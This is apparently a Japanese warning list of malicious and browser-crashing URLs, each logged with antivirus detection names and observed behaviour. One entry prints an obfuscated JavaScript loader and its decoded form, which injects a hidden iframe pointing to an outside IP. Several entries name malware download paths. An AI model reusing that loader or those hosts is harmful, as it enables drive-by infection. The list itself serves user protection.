通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2008/09/24] | ウィルス名:CRYP_MANGLED |
[2008/09/14] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/09/14] | ウィルス名:ADW_CINMUSACC |
[2008/09/14] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/10/04] | ウィルス名:ADW_CINMUS |
[2008/12/15] | 再確認。ウィルス名:CRYP_NAIX-6+HEURSPY_CINMUS |
[2008/09/14] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/09/14] | ウィルス名:TSC_GENCLEAN+TROJ_NSIS.AL |
[2006/01/12] | mailtoストーム。FDDアタック。
他の方の結果は以下。 「crashmeだのconconクラッシャーだのがふんだんに仕込まれています。つまりウィルスつきのブラクラです。」 |
[2006/03/05] | 他の方の結果は以下の「」内。
「ソースチェッカーにかけると、 ※このアドレスは危険URLのひとつです。 危険!mailtoストームを発見! (376) 危険!FDDアタックを発見!(7) と出ます。 実際に踏んでみるとFDDがガリガリ言ってました。」 |
[2010/02/21] | ファイルサイズ:234 KB 。ウィルス名:CRCK_KEYGEN |
[2008/07/27] | アクセス拒否され、ウィルス名:JS_PSYME.ANQ を検出。 |
[2008/09/15] | 再確認。何故かリロードを繰り返している。ソースを見ると、MS-DOS アプリケーションを実行しようとしているようである。 |
[2008/09/15] | ウィルス名:TSPY_BANCOS 。スパイウェアである。 |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
[2008/12/28] | ウィルス名:TROJ_EXCHANGE.AO |
[2006/06/25] | 3回ほど確認。結果は以下。
1回目の確認。こんな感じ のサイト。アダルト系サイトである。 ウィルス名:EXPL_IFRAMEBO.A+TROJ_NASCENE.Y+EXPL_WMF.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。 また、これ も8枚表示する。さらに、「xpl.wmf」なるファイルも落とそうとしてくる。 2回目の確認。アクセス拒否されてページを表示できなかった。しかし、1回目と同じウィルスを検出、さらに「xpl.wmf」なるファイルも落とそうとしてくる。これ は表示しなかった。 3回目の確認。アクセス拒否されてページを表示できなかった。しかし、1回目と同じウィルスを検出、さらに「xpl.wmf」なるファイルも落とそうとしてくる。これ は8枚表示した。 ソースを見ると以下のURLを呼び出している。そのURL List解説も参照。 //countbest.net/adv/135/new3.php |
[2006/06/25] | 他の方の結果では「マカフィーが Exploit-ByteVerify を検出。」 |
[2008/07/27] | 2重拡張子。ウィルス名:TSC_GENCLEAN+WORM_SIRCAM.C |
[2007/01/05] | 2重拡張子。ウィルス名:WORM_SIRCAM.C |
[2009/05/11] | ファイルサイズ:817 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応があると思われる。 |
[2009/05/11] | ファイルサイズ:136 KB 。ウィルス名:TROJ_MURLO.BU |
[2009/05/11] | ファイルサイズ:52.0 KB 。ウィルス名:PAK_GENERIC.001 |
[2008/12/10] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
[2009/05/11] | ファイルサイズ:122 KB 。ウィルス名:TROJ_PODNUHA.BC |
[2008/10/04] | ウィルス名:TROJ_RENOS.ADX |
[2005/09/10] | ウィルス名:JS_DLOADER.I |
[2005/07/31] | ウィルス名:JS_PSYME.AF+TROJ_DLOADER.NB+JAVA_BYTEVER.A+JAVA_BYTEVER.K |
[2005/09/04] | 直リンでは403。コピペではトロイ反応あり。
確認すると色々なアダルトサイトに飛ぶ。 |
[2007/02/28] | ウィルス名:WORM_RBOT.CYM |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+TSPY_BANKER.HNW |
[2008/08/14] | 2008/07/28 にトレンドマイクロ社にファイルを提出。
2008/08/13 にその結果の連絡があり、パターンファイル[5.457.00] にてウィルス名:TROJ_BANKER.ONQ として検出するよう対応、とのこと。 実際に 2008/07/28 にDLしたファイルからウィルス名:TROJ_BANKER.ONQ を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_BANKER.ONQ を検出することを確認。 2008/07/28 から今日まではファイルの置き換えは無い、と推測される。 |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+TSPY_BANBRA.OW |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+TSPY_BANKER.HNU |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+TSPY_BANKER.HOH |
[2008/08/14] | 2008/07/28 にトレンドマイクロ社にファイルを提出。
2008/08/13 にその結果の連絡があり、パターンファイル[5.457.00] にてウィルス名:TROJ_BANKER.OUI として検出するよう対応、とのこと。 実際に 2008/07/28 にDLしたファイルからウィルス名:TROJ_BANKER.OUI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_BANKER.OUI を検出することを確認。 2008/07/28 から今日まではファイルの置き換えは無い、と推測される。 |
[2008/07/27] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/27] | ウィルス名:TSC_GENCLEAN |
[2006/06/27] | ウィルスバスターではウィルス名:TROJ_WINDUKE を検出。
Kaspersky ではウィルス名:Trojan.Win32.WinDuke を検出するらしい。 |
[2008/09/20] | こんな感じ の音楽付きサイト。しかし、何回もリロードしている感じである。 そして、ウィルス名:JS_DLOADER.GXF を複数検出。 |
[2008/10/16] | DL+解凍すると、以下の3つのファイルが現れる。3つのファイルとも2重拡張子である。
「CrossRancor_EP01_movie.wmv.exe」← ファイルサイズ:466KB 「CrossRancor_EP02_movie.wmv.exe」← ファイルサイズ:646KB 「CrossRancor_EP03_movie.wmv.exe」← ファイルサイズ:273KB 2008/07/28 にトレンドマイクロ社に3つのファイルを提出。 2008/08/13 にその結果の連絡があり、3つのファイルともウィルス名:TROJ_AGENT.RJ として検出するよう対応、とのこと。 しかし、実際に 2008/07/28 にDLしたファイルからは未だバスター無反応。 しかも、今日改めて当該URLを確認してみると 404 になっていた。 |
[2008/09/20] | ウィルス名:EXPL_ANICMOO.GEN |
[2008/09/20] | 真っ白なページだが、何回もリロードしている。そして、ウィルス名:JS_DLOADER.GXF を複数検出。 |
[2008/09/20] | ウィルス名:JS_PSYME.AMW |
[2008/09/20] | ウィルス名:JS_DLOADER.GXI 。ソースはコード変換されている部分がある。 |
[2008/09/20] | ウィルス名:TSPY_QQPASS.DHA |
[2008/09/20] | 真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。ソースはコード変換されている部分がある。 |
[2009/11/29] | 確認してみると、まず これ を表示し、許可すると こんな感じ のメール画面を表示する。
このメール画面を閉じると再び これ を表示する。 これ を許可した回数分だけ これ が開く感じであった。 元の画面は こんな感じ で、タスクの強制終了でしか脱出できなかった。 また、ソースチェッカーでは mailtoストーム と診断される。 |
[2006/07/27] | ウィルス名:DIAL_VISIONET.A |
[2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
[2008/12/10] | ウィルス名:TROJ_EXCHANGE.BE |
[2004/10/09] | 無限JavaScript。 |
[2006/03/24] | 再確認。無限ウィンドウオープン。タスクの強制終了で脱出可。 |
[2008/11/21] | ブラクラの一種と思われる。叫び声の音源が流れる。その音源は以下のURLである。
//vip.6to23.com/jpgman/gui/g.wav また、メールアカウントを執拗に作ろうとしてくる。タスクの終了で脱出。 |
[2004/07/07] | ウィルス名:WORM_ANTINNY.G |
[2004/11/07] | //masaton1900.at.infoseek.co.jp/happy777.htmに飛ぶ。 |
[2004/07/23] | 無限JavaScript。mailtoストーム。ニュースストーム。Telnetストーム。
//masaton1192.tripod.com/と//www2.strangeworld.org/をFRAMEタグで呼び出す。 |
[2006/02/13] | 海外アダルトサイト。ウィルス名:EXPL_WMF.GEN+JAVA_BYTEVER.A
「res.wmf」ファイルを繰り返しDLしろ、と言ってきて、その度にウィルス名:EXPL_WMF.GEN を検出する。 |
[2006/02/13] | 海外アダルトサイト。ウィルス名:EXPL_WMF.GEN+JAVA_BYTEVER.A
「res.wmf」ファイルを繰り返しDLしろ、と言ってきて、その度にウィルス名:EXPL_WMF.GEN を検出する。 |
[2005/03/28] | ウィルス名:JAVA_BYTEVER.A |
[2005/04/02] | 改めて確認。ウィルス未検出だが、リンク先でウィルス反応するらしい。 |
[2005/06/07] | 踏むと海外アダルトサイト。ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A |
[2005/06/10] | ノートンだとウィルス名:Downloader.Trojanを検出。 |
[2005/04/02] | ウィルス名:JAVA_BYTEVER.A-1 |
[2006/02/26] | こんな感じ のサイトだが、WinFixer2005などのスパイウェア関連の別窓を表示するので注意。 |
[2008/07/28] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_SMALL.GWL |
[2008/09/25] | 真っ白なページだが、ウィルス名:JS_SWFLASH.GG を検出。
よく見ると、左上のほうに「111」と書かれている。 |
[2008/09/25] | 真っ白なページだが、ウィルス名:JS_SWFLASH.GG を検出。
ソースを見ると、IFRAMEタグを使って以下の2つのURLを呼び出している。 //max-6.cn/a1/flink.html //max-6.cn/a1/ilink.html |
[2008/09/25] | 真っ白なページだが、ウィルス名:JS_SWFLASH.GG を検出。
よく見ると、左上のほうに「111」と書かれている。 |
[2008/09/25] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。 |
[2008/09/25] | 真っ白なページだが、ウィルス名:JS_AGENT.UPT を検出。 |
[2008/09/24] | 真っ白なページだが、ウィルス名:JS_SWFLASH.GG+JS_OBFUSCA.BTZ を検出。
このサイトは「RealNetworks,Inc」からの「RealPlayer plug-in for Internet Explorer」アドオンを実行しようとしている。 |
[2005/09/15] | 海外アダルトサイト。踏むとまずウィルス名:VBS_PSYME.ANを検出して、その後、HDDが暫らくの間ガリガリ言い出し、ウィルス名:JAVA_BYTEVER.Aを検出する。
それと同時にダイヤラーをインストールしろ、とダイアログを表示。その直後、以下の3枚の別窓を表示する。 1、「BEST LOLITA SITES」というツールバーやアドレスバーが無いWebページダイアログ。 2、//girlsteens.net/faces/gallery.php?id=10546425 3、http://www.whitelolita.com/?lolitka.dorki.info 尚、3枚の別窓を表示する過程で以下のウィルスを検出。 ウィルス名:VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E また、元の//max-young.com/を閉じると、ゾンビウィンドウっぽい動きがある。 その時にウィルス名:TROJ_DLOADER.XH や、ウィルス名:VBS_PSYME.AN を検出。 他の方の結果は以下。 「洋アダルトサイトですが、IEが強制終了してしまいました。 javaスクリプトエラーを起こしたようです。どうも別URLを開く仕掛けが上手くいかなかった様子。」 |
[2005/12/04] | 踏むと「LOLITAS BBS DOLLS」という名のサムネイルページだが、タスクバーに現れない この画面 +ダイアログを表示し、ウィルス名:VBS_PSYME.ANを検出、その後、ウィルス名:JAVA_BYTEVER.Aを検出する。
しかし、何回か確認してみると、ウィルス未検出の時もあった。 |
[2008/12/10] | ウィルス名:TROJ_TIBS.QQ |
[2008/12/10] | ウィルス名:TROJ_TIBS.QQ |
[2008/11/21] | Location ヘッダで //masaosight.me.land.to/ に飛ぶので、そちらのURL List解説を参照。 |
[2005/07/16] | タイトルが「.......................................」という真っ白なページ。
よく見ると左上のほうにドットサイズの小さな黒い「点」が4〜5秒ごとに点滅している。 この「点」が点灯している時にポインタの先端を合わせて右クリック→ソースを見てみると以下のURLを表示しているのが分かる。 //www1.addfreestats.com/cgi-bin/connect.cgi?usr=00115744P000 ↑ 単なるgif画像。 また、元の//maxpages.com/popad.htmには別窓が付いている。その別窓は複数ある模様。確認した別窓のうち、以下の4つを参照のこと。別窓の種類は他にも複数ある。 別窓1 、 別窓2 、 別窓3 、 別窓4 |
[2005/07/15] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1
数秒ごとに色々な海外アダルトサイトを表示していく。その過程で更にウィルス名:JAVA_BYTEVER.A+JS_PSYME.AF+EXPL_IFRAMEBO.A+TROJ_DLOADER.NBを検出。 次々と新窓表示していくため、放っておくとHDDが唸り出し、場合によってはフリーズする。 以下は表示したURLの一部。この順番通りに表示。放っておくと更に開くと思われる。 //somesexpics.com/?maxypics.com //coolteenpussy.com/?maxypics.com //allteenmodel.com/?maxypics.com //www.worldsex.co.yu/ //www.sweetschoolgirl.com/ //66.250.131.174/search/find_m.html |
[2005/07/15] | ウィルス名:JAVA_BYTEVER.A-1
<script language=javascript>eval(String.fromCharCode(100,111,99, 117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114, 97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,56,50,46, 49,55,57,46,49,55,48,46,49,49,47,51,53,57,47,39,32,115,116,121, 108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39, 62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ ソースを見ると上のような暗号化された部分がある。数字の部分を読めるようにすると以下のようなスクリプトであることが分かる。 ↓ document.write("<iframe src='http://82.179.170.11/359/' style='display : none'></iframe>") |
[2004/04/07] | ジョークサイト:奇妙なグラフィックが出現。読み込みが終わると音楽と共にブラウザが跳ね回る。
ダブルクリックすると画面が変わり、また別の悪趣味な気持ち悪い絵(目の絵が沢山)のグラフィックが……。 |
[2006/01/14] | ブラクラ。無限ループ。 |
[2004/05/30] | ブラクラ。 |
[2004/02/22] | 無限JavaScript。 |
[2004/10/01] | 「超フリー掲示板」というサイトだが悪意ある投稿者によりウィルス+スパイウェア憑きサイト等を呼ばれる。 |
[2004/10/08] | ウィルス名:JS_STARTPAG.AD+WORM_CULT.B+WORM_HYBRIS.B+SPYW_BRISS.A
ウイルス+スパイウエア+ブラクラ+exeDL、とかなり強力なので注意。 |
[2004/11/07] | mailtoストーム。悪意あるユーザーが自由に危険なタグを付加することのできる掲示板。 |
[2004/02/07] | //www.raus.de/crashmeに飛ぶ。 |
[2008/09/17] | ウィルス名:TROJ_SMALL.EBN |
[2004/06/27] | ノートン無反応だがIEが落ちる。 |
[2009/05/11] | ファイルサイズ:141 KB 。ウィルス名:TROJ_GENERIC |
[2006/09/06] | 2006/08/26 にトレンドマイクロ社にDL+解凍して現れた「star_of_bethlehem_setup_td035.exe」ファイルを提出。
今日、その結果の連絡があり、それは以下。 このファイルにつきましては、ファイル内に「SPYW_KEENVAL.B」と「SPYW_KEENVAL.A」を含んでおり、実行されると前述のスパイウェアとして検出対応いたします。 しかしながら、本ファイルの状態(実行しない状態)ですと安全ですので弊社では現段階では検出対応いたしません。 |
[2006/08/29] | 2006/08/22 にトレンドマイクロ社にDL+解凍して現れた「Butterfly_ani_setup_td035.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_KEENVAL.AT として検出するよう対応、とのこと。 2006/08/22 にDLしたファイルからウィルス名:TROJ_KEENVAL.AT を検出することを確認。 また、当該URLからDLしてみてもウィルス名:TROJ_KEENVAL.AT を検出することを確認。 |
[2006/08/29] | 2006/08/22 にトレンドマイクロ社にDL+解凍して現れた「Cat_Running_setup_td035.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_KEENVAL.AT として検出するよう対応、とのこと。 2006/08/22 にDLしたファイルからウィルス名:TROJ_KEENVAL.AT を検出することを確認。 また、当該URLからDLしてみてもウィルス名:TROJ_KEENVAL.AT を検出することを確認。 |
[2006/08/31] | DL+解凍すると「Cherub_setup_td035.exe」なるファイルが現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → TR/Dldr.Keenval.B.2 BitDefender → Trojan.Downloader.Keenval.M DrWeb → Trojan.DownLoader.5455 Fortinet → W32/Keenval.M!tr Ikarus → AdWare.Keenval.A Kaspersky → Trojan-Downloader.Win32.Keenval.m VBA32 → Trojan-Downloader.Win32.Keenval.c 2006/08/22 に この「Cherub_setup_td035.exe」ファイルをトレンドマイクロ社に提出。 今日、その結果の連絡があり、「単体では不正な活動を行わないファイルであり、弊社として対応は行わない」ということであった。 |
[2006/09/01] | 2006/08/26 にトレンドマイクロ社にDL+解凍して現れた「spider_setup_td035.exe」ファイルを提出。
2006/08/31 にその結果の連絡があり、ウィルス名:TROJ_KEENVAL.AG として検出するよう対応、とのこと。 2006/08/26 にDLしたファイルからウィルス名:TROJ_KEENVAL.AG を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_KEENVAL.AG を検出することを確認。 |
[2006/02/25] | 他の方の結果では「Winfixer2005をインストールさせようとしてきます。これはスパイウェアなのでインストールしないでください。」 |
[2008/09/19] | 実際は「install.exe」が落ちてくる。しかし、ウィルス名:ADW_MAXSEARCH.AG を検出。 |
[2006/08/03] | 2006/07/22 にトレンドマイクロ社にファイルを提出。
2006/07/26 に連絡があり、ウィルス名:ADW_SOFTMATE.Q として検出るすよう対応とのこと。 2006/07/22 にDLしたファイルを確認するとウィルス名:ADW_SOFTMATE.Q を検出。 しかし、2006/07/26 に当該URLからDLするとバスター無反応。 今日、改めて当該URLからDLしても、バスター無反応。 恐らく、このURLは新しいファイルに随時置き換えられるものと推測される。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:ADW_MYTOOLBAR.F として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:ADW_MYTOOLBAR.F を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている。 |
[2008/09/19] | 実際は「install.exe」が落ちてくる。しかし、ウィルス名:ADW_MAXSEARCH.AG を検出。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_MYTOOLBAR.G として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:ADW_MYTOOLBAR.G を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている。 |
[2008/09/19] | 実際は「install.exe」が落ちてくる。しかし、ウィルス名:ADW_MAXSEARCH.AG を検出。 |
[2006/11/04] | 「launcher.exe」ではなく、「maxidr.avi」が落ちてくるが、ウィルス名:TROJ_MULDROP.FJ を検出。 |
[2005/07/18] | 日本語のアダルトサイト。サムネイル画像をクリックするとexeをDL出来る。
そのexeからウィルス名:TROJ_MYFTU.Aを検出。 実行してしまうと、メールアドレスなどをその業者サイトなどに送信してしまうらしい。 |
[2008/12/10] | ウィルス名:TROJ_EXCHANGE.BX |
[2007/05/20] | 2007/02/14 にトレンドマイクロ社にファイルを提出。
2007/02/16 にその結果の連絡があり、ウィルス名:TROJ_AGENT.VAP として検出するよう対応、とのこと。 しかし、実際には 2007/02/14 にDLしたファイルからはウィルス名:TROJ_DLOADER.LBB を検出する。 しかも、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DLOADER.LBB を検出する。 |
[2008/09/19] | ウィルス名:TROJ_FAKEAV.FP |
[2006/01/03] | スパイウェア配布サイト。こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。 |
[2006/01/03] | スパイウェア配布サイトのページ。こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。
このページの下のほうは こんな感じ になっていて、「Download the MegaSearch Toolbar」というボタンをクリックすると、以下のexeファイルをDLすることが出来るが、このexeからウィルスを検出する。 //megasearchbar.com/toolbar/MegasearchBarSetup.exe |
[2005/11/20] | ウィルス名:SPYW_MEGASRCH.A
下のURLの ポインタが指しているボタン をクリックしても、MegasearchBarSetup.exe がDLされる。 //megasearchbar.com/download.html |
[2005/07/18] | ウィルス名:TROJ_DELF.EW |
[2005/11/18] | ウィルス名:SPYW_KEYLOG95.A |
[2006/07/14] | ウィルス名:TROJ_Generic |
[2004/02/15] | 無限JavaScript。 |
[2006/02/22] | 再確認。踏むと このウィンドウ が次々と開いていく。タスクの強制終了で脱出可。 |
[2005/10/24] | DLまでバスター無反応。解凍した途端、バスター反応。ウィルスの詰め合わせである。
ウィルス名:TROJ_PSWATCHER.A+TROJ_TKITSPY.A+TROJ_TKITSPY.B |
[2008/08/18] | 再確認。DL+解凍すると以下の6つのファイルが現れるが、5つのファイルからウィルスを検出。
「WSKGSPY.VXD」← ウィルス名:TROJ_TKITSPY.B 「Ecl1pse.dll」← ウィルス名:TROJ_TKITSPY.A 「Winsok packet editor.exe」← ウィルス名:TROJ_DOWNLOAD.E 「tminfo1.dat」← ウィルス名:TROJ_TKITSPY.B 「tminfo.dat」← ウィルス名:TROJ_PSWATCHER.A 「WINSOCK PACKET EDITOR.HLP」← バスター無反応。 |
[2004/06/03] | 無限JavaScript。FDDアタック。Ctrl+Alt+Delで脱出。 |
[2004/03/14] | スクリプト入り:「超田代砲改」 |
[2006/11/04] | これ が動きまくるブラクラのようだが、タスクバーより閉じればそれで終わり。 |
[2004/02/15] | ブラクラだがブラクラチェッカーは無反応。 |
[2005/07/27] | 再確認。ブラクラの一種。ウィンドウがちらつく。ソースに以下のように書いてある。
「ウインドウを止めるには、Alt+F4を押します。Ctrl+Alt+Deleteでも、止める事が出来ます。」 ↑その通りに実行すれば終了する。 |
[2004/03/19] | スパイウェアの反応あり。 |
[2004/02/07] | 「Win2010を起動しています」とでるびっくりブラクラ。Alt+F4 で脱出。最後の方で本物のブラクラ。 |
[2004/11/27] | ウィルス名:VBS_REDLOF.A+VBS_REDLOF.A-11 |
[2004/02/14] | NestedHTML[table]。tableタグが大量にネストされている。 |
[2004/10/03] | ウィルス名:ATVX_EXPLODER+スパイウェア |
[2004/02/29] | フルスクリーンで //dms100.org/worksucks に飛ぶ。 |
[2004/08/24] | リンク先にウィルス+スパイウェアあり。 |
[2004/09/27] | 1回目に踏んだときは画像が表示されない白紙のページ。2回目がひまわりの画像。3回目はexeの無限DL。
IFRAMEタグでcgiを呼び出し、Locationヘッダで //www.malware.com/forceframe2a.html に飛ぶ |
[2004/10/24] | 環境によりノートンがトロイを検出し、小さな窓が一杯開いて画面中を飛び跳ねる状態になる。 |
[2004/10/24] | Locationヘッダで次のどれかに飛ぶらしい。
//oss.jodi.org/ss.html //www.malware.com/forceframe2a.html //www89502.nu.nun.nu/www2.strangeworld.org/uedakana/sahra6138.jpg //omanko45.tvheaven.com/ //www2.strangeworld.org/slot/riko/img-box/2003043.jpg //www.geocities.jp/mmoussyy/index.htm |
[2005/02/24] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
//gb.bbs.ws/book.php?book=xtrime に飛び、別窓で「WEB SEX SEARCH」という検索サイトを表示。 |
[2005/12/04] | 踏むと「ゲストの落書帳」という名の画像掲示板だが、タスクバーに現れない この画面 +ダイアログを表示し、ウィルス名:VBS_PSYME.ANを検出、その後、ウィルス名:JAVA_BYTEVER.Aを検出する。
新規投稿が続くと「次のページ」に随時 落ちていくと思われる。 しかし、何回か確認してみると、ウィルス未検出の時もあった。 |
[2007/05/28] | ウィルス名:TROJ_BANLOAD.CPG |
[2005/07/17] | 日本語のアダルトサイト。サムネイルをクリックするとexeが落ちてくる。
DLするとウィルス名:TROJ_MYFTU.Dを検出。 |
[2005/05/01] | 「メンズ・チャンネル」というアダルトサイトで、そのページまでは無害だが、サムネイルをクリックすると、exeファイル:ウィルス名:Trojan.KillFiles.uというトロイの木馬が落ちてくる。 |
[2005/05/31] | 踏むと日本語のアダルトサイト。小窓がうようよしている。
その小窓のURLは//menschannel.tv/showMovie.php?C=none&MV=503512 その小窓をクリックすると、「satomi.exe」が落ちてくる。ファイルサイズは 290KB 。 バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。 Antidote → ウィルス名:Trojan-PSW.Win32.VB.ex ClamAV → ウィルス名:Trojan.W32.Msbook Kaspersky Anti-Virus → ウィルス名:Trojan-PSW.Win32.VB.ex mks_vir → ウィルス名:Trojan.Killfiles.U VBA32 → ウィルス名:Win32.Trojan.KillFiles.u |
[2005/05/02] | 「chika.exe」というファイルが落ちてくる。ノートン、バスター共に無反応だが、a-squaredでスキャンするとウィルス名:Trojan.Win32KillFiles.uを検出。
実行すると、ワンクリ業者にメールアドレスを抜かれる。 |
[2008/12/28] | ウィルス名:TROJ_ZLOB.FEM |
[2008/11/14] | ウイルス名:BKDR_FLOOD.B |
[2008/11/14] | ウィルス名:BKDR_BIFROSE.ZN |
[2008/11/14] | ウィルス名:PE_JEEFO.A |
[2005/02/26] | 無限ループ。 |
[2008/09/19] | ウィルス名:TROJ_SRIZBI.M |
[2008/12/28] | ウィルス名:TROJ_PANDEX.GV |
[2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
[2008/09/19] | ウィルス名:TROJ_SRIZBI.U |
[2008/12/28] | ウィルス名:TROJ_NUWAR.CSH |
[2007/01/04] | ウィルス名:Possible_Lineage |
[2008/09/19] | ウィルス名:TROJ_BANLOAD.EQC |
[2008/09/19] | ウィルス名:TROJ_BANKER.PDZ |
[2005/09/23] | 以前はウィルス満載のサイト。現在は404 Error - File Not Foundになっている。
踏むと こんな感じ の「File Not Found」のサイト。バスター無反応。 しかし、周囲のスクリーンセーバーをDLしろ、というバナー広告のリンク先を掘っていくとスパイウェアがあることが判明。 そのスパイウェアは ADW_GATOR.A で下のcabファイル。バスターで反応。 //dist.belnk.com/4/download/TR-34_trickler_6106.cab |
[2009/01/30] | こんな感じ のサイトだが、ウィルス名:HTML_IFRAME.AFB を検出。 |
[2009/03/29] | こんな感じ のサイト。中央やや下よりの「PLAY」をクリックすると悪質なブラクラが始まる。クリックしなければ無害と思われる。
音声付きで、画面が固まる場合がある。バスターは無反応であった。 |
[2009/03/29] | 他の方の結果は以下の「」内。
「踏んでみると黒人?の顔と共にウィンドウが次々と開き、その直後に Kaspersky がウイルス「Exploit.HTML.DialogArg」を検出。」 |
[2008/09/11] | 直踏みでは、こんな感じ のフラッシュ画面を表示するが、挙動が怪しい。
何かを繰り返し実行しようとしているようで、以下のURLを2度開いてくる。しかし、404 であった。 //mirror.servut.us/flash/4chan-f/H/www.pokemon.com ポップアップ表示を拒否していれば無事に済むと思われるが、ポップアップ表示を許可した途端、ブラクラの症状を発動するので注意。 |
[2008/09/11] | 他の方の結果は以下の「」内。
「フラッシュが見れますがブラクラ的動作をして Kaspersky がトロイの木馬を遮断するので踏まない方がいいでしょう。」 |
[2008/09/20] | ウィルス名:TROJ_NUWAR.GFZ |
[2005/01/25] | 画像にまぎれて危険URL://xlola.ecstazy.info/ に接続している。 |
[2005/01/25] | 踏むとアダルトサイトだが左上のほうにドットサイズの黒い点がある。
この黒い点が //xlola.ecstazy.info/ をIFRAMEタグで呼び出している「点」。 ちなみに //xlola.ecstazy.info/ 直踏みでは真っ白なページだがソースを見ると何かを実行する記述が書いてある。 |
[2008/12/28] | ウィルス名:TROJ_FAKEAV.CK |
[2007/01/15] | ウィルス名:WORM_BAGLE.GM |
[2005/04/17] | ウィルス名:WORM_HYBRIS.B |
[2005/07/18] | ウィルス名:TROJ_VB.DF |
[2005/03/30] | ウィルス名:WORM_MABUTU.A |
[2008/12/28] | ウィルス名:TROJ_DLOADR.JI |
[2006/06/03] | メモ帳のアイコンをしたexe。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/PSW.Lineage.WO Avast → Win32:Trojano-3372 BitDefender → Dropped:Generic.Malware.FM.15F2C710 DrWeb → Trojan.PWS.Lineage Ikarus → Backdoor.Win32.Rbot.AEU McAfee → PWS-Lineage NOD32v2 → a variant of Win32/PSW.Lineage.DN VBA32 → suspected of Trojan-PSW.Lineage.3 |
[2005/04/13] | ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2006/09/19] | 2006/09/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_ERODIAL.OF として検出するよう対応、とのこと。 2006/09/12 にDLしたファイルからウィルス名:DIAL_ERODIAL.OF を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ERODIAL.OF を検出することを確認。 |
[2005/10/30] | ウィルス名:JS_SPAWN.A |
[2007/01/12] | 無限アラート。これ を閉じても閉じても表示する。タスクの強制終了で脱出。 |
[2007/01/12] | 他の方の結果は以下。
「まず拡張子が偽造されています。この時点で怪しいです。 拡張子は.htm です。実行すると「このスレ定期的に立つNE」の文字とAAがでます。 ですが消す事ができませんのでタスクマネージャーから消しましょう。」 |
[2005/10/01] | ウィルス名:VBS_PSYME.AN+JS_INOR.AB+JAVA_BYTEVER.A
gif画像ではなく、htmlスクリプト。閉じると以下の @ を新窓表示。 また、/1128099284.gif には別窓が1枚ある。そのURLは A 。 //www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1 …@ //lol.to/add-gb.php?book=DAHH&action=new&pg=1 …A |
[2008/08/29] | 2008/08/22 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_BANCOS.ATF として検出するよう対応、とのこと。 実際に 2008/08/22 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANCOS.ATF を検出することを確認。 2008/08/22 から今日までのファイルの置き換えは無いと推測される。 |
[2005/11/30] | ウィルス名:HTML_CRINET.A 。microsoftに繋ぐtelnetが大量に開く。 |
[2005/12/03] | ノートンでは、ウィルス名:HacktoolDoS を検出するらしい。 |
[2006/01/21] | 他の方の結果は
「トロイの木馬:VBS/DDoS-iFrameNet。telnet を開きに行きます。攻撃先はmicrosoft.com (??) 」 |
[2006/02/12] | 「KingsoftAntiVirus2006 では Risk,Exploit,wmf が検出されました。」 |
[2006/04/18] | 「VB2005反応アリ。有害。HTML_CRINET.A
詳細は実行されると、IFRAMESを用いて大量のTelnetを開き、Webサイトに接続します。これによりシステムリソースを消費し、ネットワークの通信速度を低下させる場合があります。」 |
[2006/05/02] | 「Trojan.VBS.IFrame 検出のtelnetストームのブラクラでした。」 |
